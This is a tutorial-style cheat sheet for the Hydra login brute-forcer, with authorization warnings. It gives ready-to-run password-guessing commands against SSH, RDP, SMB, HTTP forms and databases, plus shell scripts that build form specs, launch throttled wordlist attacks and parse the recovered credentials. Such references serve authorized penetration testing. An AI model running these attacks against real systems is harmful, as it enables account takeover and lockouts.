Hydra Cheat Sheet
Parallelized online login brute-forcer for many protocols.
Overview
THC-Hydra performs online password guessing against network services (SSH, RDP, HTTP forms, SMB, databases, etc.). It is noisy, slow against targets that throttle connections, and routinely triggers account lockouts or alerts. Ethics: use it only against systems and accounts covered by written authorization; unauthorized login attempts are illegal. Credential stuffing with leaked password lists belongs in lab environments and only where the engagement scope explicitly allows it.
Install
```bash
sudo apt install hydra
hydra -h
```
Essential commands
```bash
hydra -l admin -P passwords.txt ssh://10.10.10.5
hydra -L users.txt -p 'Password1!' rdp://10.10.10.10
hydra -l user -P pass.txt 10.10.10.20 http-post-form "/login:user=^USER^&pass=^PASS^:F=invalid"
```
Common workflows
SSH (keep -t low; sshd limits concurrent unauthenticated connections via MaxStartups)
```bash
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.5 -t 4 -f
hydra -L users.txt -P pass.txt ssh://target -o hydra_ssh.txt
```
SMB / RDP (Hydra itself warns that RDP servers dislike parallel connections; use -t 1 and add -W 1 if the server needs time to recover)
```bash
hydra -L users.txt -P passwords.txt smb://10.10.10.5
hydra -l administrator -P pass.txt rdp://10.10.10.10 -t 1
```
HTTP POST form (module string is PATH:BODY:CONDITION; ^USER^ and ^PASS^ are substituted per attempt)
```bash
hydra -l admin -P pass.txt 10.10.10.20 http-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed"
```
HTTP basic / digest
```bash
hydra -L users.txt -P pass.txt 10.10.10.20 http-get /
hydra -l user -P pass.txt 10.10.10.20 http-head /admin/
```
Database
```bash
hydra -l sa -P pass.txt mssql://10.10.10.30
hydra -l postgres -P pass.txt postgres://10.10.10.30
```
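The HTTP form module is where most Hydra runs go wrong, because the module string is split on ":" and any literal colon inside a field (the "Header: value" of an H= option is the usual one) has to be escaped as "\:". The helper below is an added example, not Hydra's own code or documentation; it joins the fields with the escaping applied and refuses specs that lack ^USER^, ^PASS^ or an F=/S= condition. The path, cookie value, host and match strings are made up for the demo, which prints the resulting command instead of running it.

```shell
#!/bin/sh
# Added example (not part of THC-Hydra): build and sanity-check the module
# string for http-post-form / http-get-form. Hydra splits the string on ":",
# so a literal colon inside a field (e.g. "Header: value" in H=) must be
# escaped as "\:". Path, cookie value, host and strings below are made up.
set -eu

# hydra_form_spec PATH BODY CONDITION [EXTRA...] -> prints the joined spec
#   PATH       /login.php
#   BODY       'username=^USER^&password=^PASS^'
#   CONDITION  'F=Login failed'  (or 'S=Welcome' to match on success)
#   EXTRA      further options, e.g. 'H=Cookie: PHPSESSID=...' or 'C=/login.php'
hydra_form_spec() {
    local spec="" field escaped
    for field in "$@"; do
        # escape literal colons so Hydra does not treat them as field separators
        escaped=$(printf '%s' "$field" | sed 's/:/\\:/g')
        if [ -z "$spec" ]; then
            spec=$escaped
        else
            spec="$spec:$escaped"
        fi
    done
    printf '%s\n' "$spec"
}

# hydra_form_spec_check SPEC -> 0 if both placeholders and a condition are
# present, 1 otherwise. A missing ^PASS^ or a missing F=/S= string is the
# usual reason a form run reports every password as valid, or none at all.
hydra_form_spec_check() {
    local spec=$1
    case $spec in *'^USER^'*) ;; *) echo "spec lacks ^USER^" >&2; return 1 ;; esac
    case $spec in *'^PASS^'*) ;; *) echo "spec lacks ^PASS^" >&2; return 1 ;; esac
    case $spec in *':F='*|*':S='*) ;; *) echo "spec lacks an F= or S= condition" >&2; return 1 ;; esac
    return 0
}

# Demo: compose the argument for the HTTP POST form workflow and print the
# command rather than running it (constructed target and cookie).
spec=$(hydra_form_spec /login.php 'username=^USER^&password=^PASS^' 'F=Login failed' 'H=Cookie: PHPSESSID=deadbeef')
hydra_form_spec_check "$spec"
printf 'hydra -l admin -P pass.txt 10.10.10.20 http-post-form "%s"\n' "$spec"
```

Confirm the F= or S= string against a real failed and a real successful request (curl with a known-bad and a known-good password) before pasting the generated command into a run.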
| Flag | Meaning |
|---|---|
| -l / -L | Single user / user list |
| -p / -P | Single pass / wordlist |
| -t | Parallel connections per target (default 16) |
| -f | Exit when the first valid login/pass pair is found |
| -V | Show each login/pass attempt |
| -o | Write found pairs to a file |
| -s | Port, if not the service default |
| -w / -W | Max seconds to wait for a response (default 32) / seconds to wait between connects per thread |
Tips
- Ethics: throttle (-t, -W), use dedicated lab VMs, and respect lockout policies (stop before the threshold); never spray production without approval.
- HTTP form modules need an exact match string: F= taken from the response to a failed login, or S= taken from the response to a successful one. Verify it with a real failed and a real successful request first, or Hydra will report every password (or none) as valid.
- Try one known-good password first to validate module syntax before full wordlists.
- For AD, prefer netexec/kerbrute with proper auth workflows over blind Hydra on domain controllers.
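The "try one known-good password first" tip and the -o output file fit together into a small workflow: probe with the credential you already know, refuse to start the wordlist unless Hydra actually reports it, then parse whatever the real run writes. The script below is an added example, not Hydra's own code; it assumes Hydra's default text output format (one "# Hydra vX run at ..." header line, then one "[PORT][service] host: H   login: U   password: P" line per hit). The sample output file, hosts, logins and passwords are constructed for the demo, so the parser can be exercised without a live target.

```shell
#!/bin/sh
# Added example (not Hydra's own code): parse the -o output file and gate a
# wordlist run on a known-good credential first. The sample -o file and the
# hosts, logins and passwords in it are constructed, not real captures.
set -eu

# Hydra's -o text output is one header line ("# Hydra vX.Y run at ...") and
# then one line per found pair:
#   [PORT][service] host: HOST   login: LOGIN   password: PASSWORD
# parse_hydra_output FILE -> CSV lines "host,service,login,password".
# The password is everything after "password: ", so values containing spaces
# survive; logins containing spaces are not handled (use -b json for those).
parse_hydra_output() {
    awk '
        /^\[[0-9]+\]\[/ {
            svc = $1
            sub(/^\[[0-9]+\]\[/, "", svc); sub(/\]$/, "", svc)
            host = $3
            l = index($0, "login: "); p = index($0, "password: ")
            login = substr($0, l + 7, p - l - 7); sub(/[ \t]+$/, "", login)
            pass = substr($0, p + 10)
            print host "," svc "," login "," pass
        }' "$1"
}

# hydra_hit_count FILE -> number of found pairs in a -o file
hydra_hit_count() {
    parse_hydra_output "$1" | wc -l | tr -d ' '
}

# hydra_checked_run USER KNOWN_PASS WORDLIST TARGET_ARGS...
# 1. run the module once with a credential you already know works (-p, -t 1);
# 2. refuse to start the wordlist unless that produced a hit, because a wrong
#    module string or F= condition would otherwise burn the whole list (and
#    the lockout budget) while reporting nonsense;
# 3. run the list throttled (-t 4, -W 1) and print the parsed hits.
hydra_checked_run() {
    local user=$1 known=$2 wordlist=$3
    shift 3
    local probe out
    probe=$(mktemp)
    out="hydra_$(date +%Y%m%d_%H%M%S).txt"
    hydra -l "$user" -p "$known" -t 1 -f -o "$probe" "$@" >/dev/null 2>&1 || true
    if [ "$(hydra_hit_count "$probe")" -eq 0 ]; then
        echo "sanity check failed: known-good credential not detected; fix the module/F= string first" >&2
        rm -f "$probe"
        return 1
    fi
    rm -f "$probe"
    hydra -l "$user" -P "$wordlist" -t 4 -W 1 -f -o "$out" "$@" || true
    parse_hydra_output "$out"
}

# write_sample_output FILE: a constructed -o file in Hydra's text format,
# used so the parser can be exercised without a hydra binary or a target.
write_sample_output() {
    cat >"$1" <<'EOF'
# Hydra v9.5 run at 2024-01-01 12:00:00 on 10.10.10.5 ssh (hydra -l root -P pass.txt -o out.txt ssh://10.10.10.5)
[22][ssh] host: 10.10.10.5   login: root   password: Summer 2024!
[22][ssh] host: 10.10.10.5   login: svc_backup   password: backup123
EOF
}

# Demo on the constructed sample.
sample=$(mktemp)
write_sample_output "$sample"
parse_hydra_output "$sample"
echo "hits: $(hydra_hit_count "$sample")"
rm -f "$sample"
# Real use, once the target is in scope (constructed host and strings):
#   hydra_checked_run admin 'KnownGoodPass1!' pass.txt 10.10.10.20 http-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed"
```

The probe run deliberately uses -t 1 so that a module that only misbehaves under parallel connections (RDP is the common case) is caught before the full list is thrown at it.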